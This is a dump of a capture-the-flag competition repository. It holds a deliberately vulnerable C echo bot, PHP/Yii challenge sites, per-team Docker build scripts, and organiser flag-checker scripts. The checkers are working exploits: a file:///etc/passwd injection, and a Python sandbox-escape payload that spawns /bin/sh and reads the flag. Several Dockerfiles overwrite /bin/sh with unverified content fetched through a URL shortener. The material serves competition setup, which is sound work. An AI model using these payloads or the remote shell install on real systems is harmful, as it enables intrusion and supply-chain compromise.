// buf holds the line typed by the user (filled by fgets in main);
// response holds the text echoed back by kirim().
static char buf[1024];
static char response[1024];

// Copies the user's line into response.
// Defect: buf is passed as the *format string*, so any conversion specifier
// the user types is interpreted by snprintf. The data-only form is
// snprintf(response, sizeof response, "%s", buf).
void respon(){
    snprintf(response, 0x400, buf);
}

// Echoes the user's line and then prints one of three canned answers chosen
// from an int read from /dev/urandom.
void kirim() {
    setvbuf(stdout, NULL, _IONBF, 0);
    FILE *fp;
    int randomData, random;
    setvbuf(stdout, NULL, _IONBF, 0);
    // The fopen result is not checked for NULL, the fread return value is
    // ignored, and fp is never closed, so every call leaks one open stream.
    fp = fopen("/dev/urandom", "r");
    fread(&random, sizeof(int), 1, fp);
    // abs(INT_MIN) is undefined behaviour; the random int can take that value.
    random = abs(random);
    randomData = random;
    respon();

    randomData = randomData % 3;
    printf("%s", response);

    if(randomData==0){
        puts("Ya!");
    } else if(randomData == 1){
        puts("Tidak!");
    } else {
        puts("Bisa jadi sih?");
    }

    putchar('\n');
    // fflush() is only defined for output streams in ISO C.
    fflush(stdin);
}

// Prints the greeting, then reads a line and answers it, forever.
int main() {
    setvbuf(stdout, NULL, _IONBF, 0);
    printf("Selamat datang di program chat bot\n");
    printf("Masukan pertanyaan anda dan bot akan menjawab dengan 'Ya', 'Tidak', atau 'Bisa jadi'\n");
    do {
        // The fgets return value is ignored, so end-of-input is not detected
        // and buf keeps its previous contents.
        fgets(buf, 0x400, stdin);
        kirim();
    // buf is an array, so this condition is always true and the loop never
    // terminates on its own.
    } while(buf);
}

-------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "cryptonode", 3 | "version": "0.0.1", 4 | "description": "An encrypted chat program", 5 | "main": "app.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1", 8 | "start": "node server.js" 9 | }, 10 | "repository": { 11 | "type": "git", 12 | "url": "git+https://github.com/Supernomad/CryptoNode.git" 13 | }, 14 | "keywords": [ 15 | "encrypted", 16 | "encryption", 17 | "aes", 18 | "aws256", 19 | "messaging", 20 |
"messenger", 21 | "im", 22 | "instant" 23 | ], 24 | "author": "Supernomad ", 25 | "license": "Apache-2.0", 26 | "bugs": { 27 | "url": "https://github.com/Supernomad/CryptoNode/issues" 28 | }, 29 | "homepage": "https://github.com/Supernomad/CryptoNode#readme", 30 | "dependencies": { 31 | "async": "^1.5.2", 32 | "express": "^4.13.4", 33 | "socket.io": "^1.4.5" 34 | }, 35 | "devDependencies": { 36 | "bower": "^1.7.7", 37 | "gulp": "^3.9.1", 38 | "gulp-istanbul": "^0.10.3", 39 | "gulp-mocha": "^2.2.0", 40 | "gulp-plumber": "^1.1.0", 41 | "minimist": "^1.2.0", 42 | "plumber": "^0.4.8", 43 | "run-sequence": "^1.1.5" 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/config/test.php: -------------------------------------------------------------------------------- 1 | 'basic-tests', 10 | 'basePath' => dirname(__DIR__), 11 | 'aliases' => [ 12 | '@bower' => '@vendor/bower-asset', 13 | '@npm' => '@vendor/npm-asset', 14 | ], 15 | 'language' => 'en-US', 16 | 'components' => [ 17 | 'db' => $db, 18 | 'mailer' => [ 19 | 'useFileTransport' => true, 20 | ], 21 | 'assetManager' => [ 22 | 'basePath' => __DIR__ . 
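'/../web/assets', 23 | ], 24 | 'urlManager' => [ 25 | 'showScriptName' => true, 26 | ], 27 | 'user' => [ 28 | 'identityClass' => 'app\models\User', 29 | ], 30 | 'request' => [ 31 | 'cookieValidationKey' => 'test', 32 | 'enableCsrfValidation' => false, 33 | // but if you absolutely need it set cookie domain to localhost 34 | /* 35 | 'csrfCookie' => [ 36 | 'domain' => 'localhost', 37 | ], 38 | */ 39 | ], 40 | ], 41 | 'params' => $params, 42 | ]; 43 |
--------------------------------------------------------------------------------
/2017-finals/flag_tester/test_service_4.py:
--------------------------------------------------------------------------------
"""Organiser-side flag checker for one web service.

For every team it registers a throw-away account, logs in, fills in the
profile form, then downloads the file the profile page links as the avatar
and searches it for the flag. One ``flag,team,service`` row is printed per
team that yields a flag.
"""
from twill.commands import *
import re
import sys
import time

import requests

# NOTE(review): as shown on this page this script is identical to
# test_service_7.py, including the "07" port suffix and the ",7" column.
# Presumably it was meant to target service 4 -- confirm before relying on it.

# Seconds to wait for the avatar download; without a timeout a dead service
# would hang the whole sweep.
HTTP_TIMEOUT = 10

IMG_RE = re.compile(r'img src="(.*\.jpg)"')
FLAG_RE = re.compile(r'(HackToday\{.*\})')

redirect_output('out.txt')


def fetch_flag(team):
    """Return the flag found on *team*'s instance, or None if it is absent."""
    base_url = "http://sawah.ittoday.web.id:3%02d07" % team
    prf_url = base_url + "/profile"

    # Timestamped name so repeated runs do not collide on registration.
    stamp = str(int(time.time()))
    username = "__panitiatest" + stamp
    password = "__panitiatest" + stamp

    for url in (base_url + "/register", base_url + "/login"):
        go(url)
        fv("1", "username", username)
        fv("1", "password", password)
        submit("1")

    go(prf_url)
    fv("1", "fullname", "Panitia")
    fv("1", "birthdate", "01/01/1970")
    fv("1", "address", "Localhost")
    # The avatar field is given a file:// URL; the flag is then looked for
    # in whatever the service stored as the avatar.
    fv("1", "avatar", "file:///etc/passwd")
    submit("1")

    go(prf_url)
    img_match = IMG_RE.search(get_browser().get_html())
    if img_match is None:
        return None

    img_content = requests.get(
        base_url + '/' + img_match.group(1), timeout=HTTP_TIMEOUT
    ).text
    flag_match = FLAG_RE.search(img_content)
    return flag_match.group(1) if flag_match else None


for team in range(1, 11):
    try:
        flag = fetch_flag(team)
    except Exception as exc:
        # One unreachable or broken service must not stop the other teams
        # from being checked.
        sys.stderr.write("team %d: check failed: %s\n" % (team, exc))
        continue
    if flag is None:
        sys.stderr.write("team %d: flag not found\n" % team)
        continue
    print(flag + "," + str(team) + ",7")
--------------------------------------------------------------------------------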
/2017-finals/flag_tester/test_service_7.py: -------------------------------------------------------------------------------- 1 | from twill.commands import * 2 | import time 3 | import re 4 | import requests 5 | 6 | redirect_output('out.txt') 7 | 8 | for team in range(1, 11): 9 | 10 | base_url = "http://sawah.ittoday.web.id:3%02d07" % team 11 | reg_url = base_url + "/register" 12 | log_url = base_url + "/login" 13 | prf_url = base_url + "/profile" 14 | 15 | t = int(time.time()) 16 | 17 | username = "__panitiatest" + str(t) 18 | password = "__panitiatest" + str(t) 19 | 20 | go(reg_url) 21 | fv("1", "username", username) 22 | fv("1", "password", password) 23 | submit("1") 24 | 25 | go(log_url) 26 | fv("1", "username", username) 27 | fv("1", "password", password) 28 | submit("1") 29 | 30 | go(prf_url) 31 | fv("1", "fullname", "Panitia") 32 | fv("1", "birthdate", "01/01/1970") 33 | fv("1", "address", "Localhost") 34 | fv("1", "avatar", "file:///etc/passwd") 35 | submit("1") 36 | 37 | go(prf_url) 38 | content = get_browser().get_html() 39 | 40 | res = re.search('img src="(.*\.jpg)"', content) 41 | img_url = base_url + '/' + res.group(1) 42 | 43 | req = requests.get(img_url) 44 | img_content = req.text 45 | 46 | res = re.search('(HackToday\{.*\})', img_content) 47 | flag = res.group(1) 48 | 49 | print flag + "," + str(team) + ",7" 50 | -------------------------------------------------------------------------------- /2017-finals/flag_tester/test_service_8.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def unicode_escape(s): 4 | res = '' 5 | for c in s: 6 | res += '\\'+oct(ord(c)).lstrip("0").zfill(3) 7 | return res 8 | 9 | def get_flag(host,port): 10 | conn = remote(host,port) 11 | 12 | payload = '__import__("os").system("/bin/sh")' 13 | payload = unicode_escape(payload) 14 | 15 | 16 | 17 | conn.sendline("# Encoding: Unicode_Escape \r" + payload) 18 | 19 | conn.recvuntil(">>>") 20 | conn.sendline("cat 
fla*") 21 | flag = conn.recvline().strip() 22 | 23 | 24 | conn.close() 25 | return flag 26 | 27 | 28 | def loop_through(): 29 | flags = [] 30 | for team in range(1,11): 31 | # ganti disiniii 32 | if team >9: 33 | team_str = str(team) 34 | else: 35 | team_str = '0'+str(team) 36 | port = int("3"+team_str+"08") 37 | flag = get_flag("agrihack.party",port) 38 | flags.append(flag.strip()) 39 | return flags 40 | 41 | 42 | 43 | def start(): 44 | flags = loop_through() 45 | count = 1 46 | file_out = open('out','w') 47 | for flag in flags: 48 | file_out.write(flag + ',' +str(count)+',8\n') 49 | count+=1 50 | 51 | 52 | #get_flag("agrihack.party",30108) 53 | start() 54 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/unit/models/UserTest.php: -------------------------------------------------------------------------------- 1 | username)->equals('admin'); 11 | 12 | expect_not(User::findIdentity(999)); 13 | } 14 | 15 | public function testFindUserByAccessToken() 16 | { 17 | expect_that($user = User::findIdentityByAccessToken('100-token')); 18 | expect($user->username)->equals('admin'); 19 | 20 | expect_not(User::findIdentityByAccessToken('non-existing')); 21 | } 22 | 23 | public function testFindUserByUsername() 24 | { 25 | expect_that($user = User::findByUsername('admin')); 26 | expect_not(User::findByUsername('not-admin')); 27 | } 28 | 29 | /** 30 | * @depends testFindUserByUsername 31 | */ 32 | public function testValidateUser($user) 33 | { 34 | $user = User::findByUsername('admin'); 35 | expect_that($user->validateAuthKey('test100key')); 36 | expect_not($user->validateAuthKey('test102key')); 37 | 38 | expect_that($user->validatePassword('admin')); 39 | expect_not($user->validatePassword('123456')); 40 | } 41 | 42 | } 43 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/unit/models/LoginFormTest.php: 
-------------------------------------------------------------------------------- 1 | user->logout(); 15 | } 16 | 17 | public function testLoginNoUser() 18 | { 19 | $this->model = new LoginForm([ 20 | 'username' => 'not_existing_username', 21 | 'password' => 'not_existing_password', 22 | ]); 23 | 24 | expect_not($this->model->login()); 25 | expect_that(\Yii::$app->user->isGuest); 26 | } 27 | 28 | public function testLoginWrongPassword() 29 | { 30 | $this->model = new LoginForm([ 31 | 'username' => 'demo', 32 | 'password' => 'wrong_password', 33 | ]); 34 | 35 | expect_not($this->model->login()); 36 | expect_that(\Yii::$app->user->isGuest); 37 | expect($this->model->errors)->hasKey('password'); 38 | } 39 | 40 | public function testLoginCorrect() 41 | { 42 | $this->model = new LoginForm([ 43 | 'username' => 'demo', 44 | 'password' => 'demo', 45 | ]); 46 | 47 | expect_that($this->model->login()); 48 | expect_not(\Yii::$app->user->isGuest); 49 | expect($this->model->errors)->hasntKey('password'); 50 | } 51 | 52 | } 53 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/views/site/register.php: -------------------------------------------------------------------------------- 1 | title = 'How To Blog | Register'; 11 | $this->params['breadcrumbs'][] = 'Register'; 12 | ?> 13 |
14 |

Register

15 | session->hasFlash('message')){ 17 | echo Yii::$app->session->getFlash('message'); 18 | } 19 | ?> 20 |

Please fill out the following fields to register:

21 | 22 | 'register-form', 24 | 'layout' => 'horizontal', 25 | 'fieldConfig' => [ 26 | 'template' => "{label}\n
{input}
\n
{error}
", 27 | 'labelOptions' => ['class' => 'col-lg-1 control-label'], 28 | ], 29 | ]); ?> 30 | 31 | field($model, 'username')->textInput(['autofocus' => true]) ?> 32 | 33 | field($model, 'password')->passwordInput() ?> 34 | 35 |
36 |
37 | 'btn btn-primary', 'name' => 'register-button']) ?> 38 |
39 |
40 | 41 | 42 |
43 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/models/UsersDB.php: -------------------------------------------------------------------------------- 1 | 'user'], 33 | [['username', 'password'], 'string', 'max' => 255, 'min' => 4], 34 | [['role'], 'string', 'max' => 5], 35 | ['username', 'checkExist'], 36 | ]; 37 | } 38 | 39 | /** 40 | * @inheritdoc 41 | */ 42 | public function attributeLabels() 43 | { 44 | return [ 45 | 'id' => 'ID', 46 | 'username' => 'Username', 47 | 'password' => 'Password', 48 | 'role' => 'Role', 49 | ]; 50 | } 51 | 52 | public function checkExist($attribute, $params){ 53 | $_user = self::find()->where(['username' => $this->username])->one(); 54 | 55 | if(count($_user)){ 56 | $this->addError($attribute, 'Username already exist'); 57 | } 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/views/site/login.php: -------------------------------------------------------------------------------- 1 | title = 'How To Blog | Login'; 11 | $this->params['breadcrumbs'][] = 'Login'; 12 | ?> 13 | 43 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/privilege_escalation/register.php: -------------------------------------------------------------------------------- 1 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 |

register

21 |
22 |
23 |
24 | 25 | 26 |
27 |
28 | 29 | 30 |
31 |
32 | 33 | 37 |
38 | 39 | 40 |
41 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/content/footer.php: -------------------------------------------------------------------------------- 1 | 2 |
3 |
4 |

Copyright © Musicality 2017

5 |
6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/app/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Crypto-Node 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 |
    20 |
21 |
22 |
23 | >
24 |
25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/models/LoginForm.php: -------------------------------------------------------------------------------- 1 | hasErrors()) { 35 | $user = $this->getUser(); 36 | 37 | if (!$user || !$user->validatePassword($this->password)) { 38 | $this->addError($attribute, 'Incorrect username or password.'); 39 | } 40 | } 41 | } 42 | 43 | public function login() { 44 | if ($this->validate()) { 45 | return Yii::$app->user->login($this->getUser(), $this->rememberMe ? 3600*24*30 : 0); 46 | } 47 | return false; 48 | } 49 | 50 | public function getUser() { 51 | if ($this->_user === false) { 52 | $this->_user = User::findByUsername($this->username); 53 | } 54 | return $this->_user; 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/unit/models/ContactFormTest.php: -------------------------------------------------------------------------------- 1 | model = $this->getMockBuilder('app\models\ContactForm') 19 | ->setMethods(['validate']) 20 | ->getMock(); 21 | 22 | $this->model->expects($this->once()) 23 | ->method('validate') 24 | ->will($this->returnValue(true)); 25 | 26 | $this->model->attributes = [ 27 | 'name' => 'Tester', 28 | 'email' => 'tester@example.com', 29 | 'subject' => 'very important letter subject', 30 | 'body' => 'body of current message', 31 | ]; 32 | 33 | expect_that($this->model->contact('admin@example.com')); 34 | 35 | // using Yii2 module actions to check email was sent 36 | $this->tester->seeEmailIsSent(); 37 | 38 | $emailMessage = $this->tester->grabLastSentEmail(); 39 | expect('valid email is sent', $emailMessage)->isInstanceOf('yii\mail\MessageInterface'); 40 | expect($emailMessage->getTo())->hasKey('admin@example.com'); 41 | expect($emailMessage->getFrom())->hasKey('tester@example.com'); 42 | 
expect($emailMessage->getSubject())->equals('very important letter subject'); 43 | expect($emailMessage->toString())->contains('body of current message'); 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /2017-finals/soal/cacah_jiwa/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 -y 12 | 13 | # Read arg 14 | ARG flag 15 | ARG flag_name 16 | ARG binary 17 | ARG username 18 | ARG password 19 | ENV flag=${flag} 20 | ENV flag_name=${flag_name} 21 | ENV binary=${binary} 22 | ENV username=${username} 23 | ENV password=${password} 24 | 25 | # Set WorkDir 26 | RUN mkdir /app 27 | WORKDIR /app 28 | 29 | 30 | # SSH Docker 31 | EXPOSE 22 32 | RUN mkdir /var/run/sshd 33 | RUN adduser --disabled-password --gecos "" $username 34 | RUN echo "$username:$password" | chpasswd 35 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 36 | 37 | 38 | # Copy ruby to workdir 39 | COPY $binary /app/$binary 40 | 41 | RUN echo $flag > "/app/$flag_name" 42 | 43 | RUN chown root:root $flag_name && chmod 755 $flag_name 44 | RUN chown "root:$username" $binary && chmod 775 $binary 45 | 46 | 47 | # Securing environment 48 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 49 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 50 | RUN chmod 755 /usr/bin/env /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/vim /usr/bin/base64 /bin/nano /usr/bin/scp 51 | 52 | # Run Program 53 | RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 54 | #CMD socat 
TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 55 | CMD ["/start.sh"] 56 | -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/Dockerfile: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.04 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 5000 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat editor ssh 11 | RUN apt-get install curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 -y 12 | 13 | # Read arg 14 | ARG flag 15 | ARG flag_name 16 | ARG binary 17 | ARG username 18 | ARG password 19 | ENV flag=${flag} 20 | ENV flag_name=${flag_name} 21 | ENV binary=${binary} 22 | ENV username=${username} 23 | ENV password=${password} 24 | 25 | # Set WorkDir 26 | RUN mkdir /app 27 | WORKDIR /app 28 | 29 | 30 | # SSH Docker 31 | EXPOSE 22 32 | RUN mkdir /var/run/sshd 33 | RUN adduser --disabled-password --gecos "" $username 34 | RUN echo "$username:$password" | chpasswd 35 | RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd 36 | 37 | 38 | # Copy ruby to workdir 39 | COPY $binary /app/$binary 40 | 41 | RUN echo $flag > "/app/$flag_name" 42 | 43 | RUN chown root:root $flag_name && chmod 755 $flag_name 44 | RUN chown "root:$username" $binary && chmod 775 $binary 45 | 46 | 47 | # Securing environment 48 | RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh 49 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 50 | RUN chmod 755 /usr/bin/env /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/vim /usr/bin/base64 /bin/nano /usr/bin/scp 51 | 52 | # Run Program 53 | RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh 54 | #CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody 55 | CMD ["/start.sh"] 56 | 
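--------------------------------------------------------------------------------
/2017-finals/soal/sanca/Dockerfile:
--------------------------------------------------------------------------------
# Per-team challenge image: serves /app/$binary on port 5000 through socat
# and runs sshd on port 22 for the team account.

# Use ubuntu 16.04
FROM ubuntu:16.04

# Open port 5000
EXPOSE 5000

# Update and install in a single layer so a cached "apt-get update" layer
# can never be paired with a newer package list.
# socat / editors / ssh / python
RUN apt-get update && apt-get install -y curl netcat-openbsd vim nano openssh-server socat lib32ncurses5 python

# Read arg
# NOTE(review): build args are recorded in the image history, and the ENV
# lines below also keep the flag and the SSH password in the environment of
# every process started from this image. Nothing visible in this file reads
# them at run time; confirm that, then drop the ENV lines for flag/password.
ARG flag
ARG flag_name
ARG binary
ARG username
ARG password
ENV flag=${flag}
ENV flag_name=${flag_name}
ENV binary=${binary}
ENV username=${username}
ENV password=${password}

# Set WorkDir
RUN mkdir /app
WORKDIR /app


# SSH Docker
EXPOSE 22
RUN mkdir /var/run/sshd
RUN adduser --disabled-password --gecos "" "$username"
RUN echo "$username:$password" | chpasswd
RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd


# Copy the challenge program to workdir
COPY $binary /app/$binary

# printf with a quoted argument writes the flag verbatim, whatever it contains
RUN printf '%s\n' "$flag" > "/app/$flag_name"

RUN chown root:root "$flag_name" && chmod 755 "$flag_name"
RUN chown "root:$username" "$binary" && chmod 775 "$binary"


# Securing environment
# NOTE(review): this overwrites /bin/sh with content fetched at build time
# through a URL shortener, with no integrity check. Whoever controls the
# redirect target controls the shell used by every later RUN step and inside
# the running container. Keep the file in the build context and COPY it, or
# verify a pinned SHA-256 before installing it.
RUN curl -Ls https://goo.gl/yia654 | base64 -d > /bin/sh
RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm
RUN chmod 755 /usr/bin/env /bin/dash /bin/bash /bin/sh /bin/nc /bin/cat /usr/bin/curl /usr/bin/groups /usr/bin/id /bin/ls /usr/bin/vi /usr/bin/vim /usr/bin/base64 /bin/nano /usr/bin/python

# Run Program
# start.sh is generated at build time: socat serves the challenge as
# "nobody" in the background, sshd stays in the foreground.
RUN echo '#!/bin/bash'"\n(socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody)&\n/usr/sbin/sshd -D" > /start.sh && chmod +x /start.sh
#CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/$binary,su=nobody
CMD ["/start.sh"]
--------------------------------------------------------------------------------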
/2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/jquery.inputmask.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * jquery.inputmask.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["jquery","./inputmask"],a):"object"==typeof exports?module.exports=a(require("jquery"),require("./inputmask")):a(jQuery,window.Inputmask)}(function(a,b){return void 0===a.fn.inputmask&&(a.fn.inputmask=function(c,d){var e,f=this[0];if(void 0===d&&(d={}),"string"==typeof c)switch(c){case"unmaskedvalue":return f&&f.inputmask?f.inputmask.unmaskedvalue():a(f).val();case"remove":return this.each(function(){this.inputmask&&this.inputmask.remove()});case"getemptymask":return f&&f.inputmask?f.inputmask.getemptymask():"";case"hasMaskedValue":return!(!f||!f.inputmask)&&f.inputmask.hasMaskedValue();case"isComplete":return!f||!f.inputmask||f.inputmask.isComplete();case"getmetadata":return f&&f.inputmask?f.inputmask.getmetadata():void 0;case"setvalue":a(f).val(d),f&&void 0===f.inputmask&&a(f).triggerHandler("setvalue");break;case"option":if("string"!=typeof d)return this.each(function(){if(void 0!==this.inputmask)return this.inputmask.option(d)});if(f&&void 0!==f.inputmask)return f.inputmask.option(d);break;default:return d.alias=c,e=new b(d),this.each(function(){e.mask(this)})}else{if("object"==typeof c)return e=new b(c),void 0===c.mask&&void 0===c.alias?this.each(function(){if(void 0!==this.inputmask)return this.inputmask.option(c);e.mask(this)}):this.each(function(){e.mask(this)});if(void 0===c)return this.each(function(){e=new b(d),e.mask(this)})}}),a.fn.inputmask}); -------------------------------------------------------------------------------- 
/2017-quals/reverse-engineering/resqua/resqua.php: -------------------------------------------------------------------------------- 1 | 0) { 12 | $n -= $i; 13 | $i += 2; 14 | } 15 | return $n == 0; 16 | } 17 | 18 | if (isset($_GET['serial'])) { 19 | 20 | $serial = $_GET['serial']; 21 | 22 | if (! (strlen($serial) == 19 && $serial[4] == '-' && $serial[9] == '-' && $serial[14] == '-')) { 23 | die("Wrong format"); 24 | } else { 25 | for ($i = 0; $i < 20; $i++) { 26 | if (isset($serial[$i]) && $serial[$i] == '0') { 27 | die("Invalid serial number"); 28 | } 29 | } 30 | 31 | $parts = explode("-", $serial); 32 | $part1 = intval($parts[0]); 33 | $part2 = intval($parts[1]); 34 | $part3 = intval($parts[2]); 35 | $part4 = intval($parts[3]); 36 | 37 | if (c($part1) && c($part2) && c($part3) && c($part4) && ($part1 < $part2 && $part2 < $part3 && $part3 < $part4)) { 38 | echo "

GRATE!

"; 39 | echo "

$FLAG

"; 40 | die(); 41 | } else { 42 | die("Invalid serial number"); 43 | } 44 | 45 | } 46 | 47 | } 48 | 49 | ?> 50 | 52 | 53 | 54 | 55 | ReSqua 56 | 57 | 58 | 59 | 60 |
61 |

Enter something:

62 | 63 |
64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/content/head.php: -------------------------------------------------------------------------------- 1 | Musicality | Web Music Sharing 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="04" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo 
"$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:80" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/birthday_card/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="01" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 | tag_name="$binary"__"$team" 23 | cport="$cport_prefix""$team""$chall_num" 24 | sport="$sport_prefix""$team""$chall_num" 25 | flag_name="flag_$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | md5sum | awk '{ print $1 }')" 26 | flag="HackToday{$(tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1 | sha256sum | awk '{ print $1 }')}" 27 | username="${usernames[$(expr $team - 1)]}" 28 | password=`echo -n "${tokens[$(expr $team - 1)]}$flag" | md5sum | awk '{print $1}'` 29 | echo "Team: $team" >> $docker_log 30 | echo "Username: $username" >> $docker_log 31 | echo "Password: $password" >> $docker_log 32 | echo "Flag filename: $flag_name" >> $docker_log 33 | echo "Flag: $flag" >> $docker_log 34 | echo "CPort: $cport" >> $docker_log 35 | echo "SPort: $sport" >> $docker_log 36 | echo 
"$flag,$(expr $team + 0),$(expr $chall_num + 0)" >> $docker_csv 37 | docker build --build-arg "password=$password" --build-arg "username=$username" --build-arg "flag=$flag" --build-arg "flag_name=$flag_name" -t $tag_name . 38 | docker run -p "$cport:5000" -p "$sport:22" -itd $tag_name 39 | done 40 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/docker_build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need chall name as argument"; echo "$0 (chall name) (team numbers)"; exit 4 | fi 5 | if [ -z "$2" ];then 6 | echo "need team numbers as argument"; echo "$0 (chall name) (team numbers)"; exit 7 | fi 8 | team_num=$2 9 | binary=$1 10 | cport_prefix="3" 11 | sport_prefix="2" 12 | chall_num="07" 13 | docker_log="docker_$binary.log" 14 | docker_csv="docker_$binary.csv" 15 | username_list="username.list" 16 | token_list="token.list" 17 | usernames=( $( cat ../$username_list ) ) 18 | tokens=( $( cat ../$token_list ) ) 19 | echo -n "" > $docker_log 20 | echo -n "" > $docker_csv 21 | for team in $(seq -f "%02g" 1 $team_num); do 22 